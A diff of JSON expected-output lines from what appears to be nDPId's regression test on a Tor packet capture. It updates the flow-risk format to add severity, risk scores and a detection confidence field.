-00772{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","16":"Suspicious DGA domain name","22":"Unsafe Protocol"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}}
-00778{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","16":"Suspicious DGA domain name","22":"Unsafe Protocol"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}}
+01040{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}}
+01046{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822123915,"flow_last_seen":1383822123915,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1383822123915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"ts_msec":1383822123915,"pkt":"\/\/\/\/\/\/\/\/UlQAwqwfCABFAACsAABAAEARtfDAqAEBwKgB\/0RcRFwAmDDeeyJob3N0X2ludCI6IDY3Njg3OTk3NiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICI2NzY4Nzk5NzYiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsxNjc4NDEyMTYsIDE4MTA4Mzk2OCwgMTgxMDgwMzI0LCAyOTU0NDE3M119"}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822123915,"flow_last_seen":1383822123915,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822123915,"flow_last_seen":1383822123915,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1835,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822124212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1835,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1836,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822126212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
@@ -181,18 +181,18 @@
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1383822129951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1383822129951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJlAAIAGv0TAqAH81FOb+sfmAbsbVwNnrWI9fVAQAQCoogAAAAAAAAAA"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1383822129961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383822129961,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x+fD3pw1Z7sOzYASOQgZlAAAAgQFtAEBBAIBAwMH"}
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1383822129962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1383822129962,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJpAAIAGdhDAqAH8W49d8sfnAbtnuw7Nw96cNlAQAQCSbgAAAAAAAAAA"}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","16":"Suspicious DGA domain name","22":"Unsafe Protocol"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01041{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}}
-01127{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","16":"Suspicious DGA domain name","22":"Unsafe Protocol"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01146{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}}
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822130216,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822130889,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1383822130889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383822130889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CK1AAIAGwljAqAH8JuVGNcfoAbv0twffAAAAAIACIABZFwAAAgQFtAEDAwgBAQQC"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1383822131033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383822131033,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x+hg0\/cE9LcH4IASOQjoIwAAAgQFtAEBBAIBAwMK"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1383822131034,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCK9AAIAGwmLAqAH8JuVGNcfoAbv0twfgYNP3BVAQAQBhAQAAAAAAAAAA"}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01040{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01145{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822132212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822134212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
@@ -259,8 +259,8 @@
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1383822190886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383822190886,"pkt":"UlQA2EYhUlQAWul3CABFAAA0COtAAIAGZnzAqAH8PtKJ5sfxAbspsDzeAAAAAIACIACTeAAAAgQFtAEDAwgBAQQC"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1383822190950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383822190950,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGvmc+0onmwKgB\/AG7x\/Gvhi1nKbA834ASOQidcgAAAgQFtAEBBAIBAwMH"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1383822190951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCOxAAIAGZofAqAH8PtKJ5sfxAbspsDzfr4YtaFAQAQAWTQAAAAAAAAAA"}
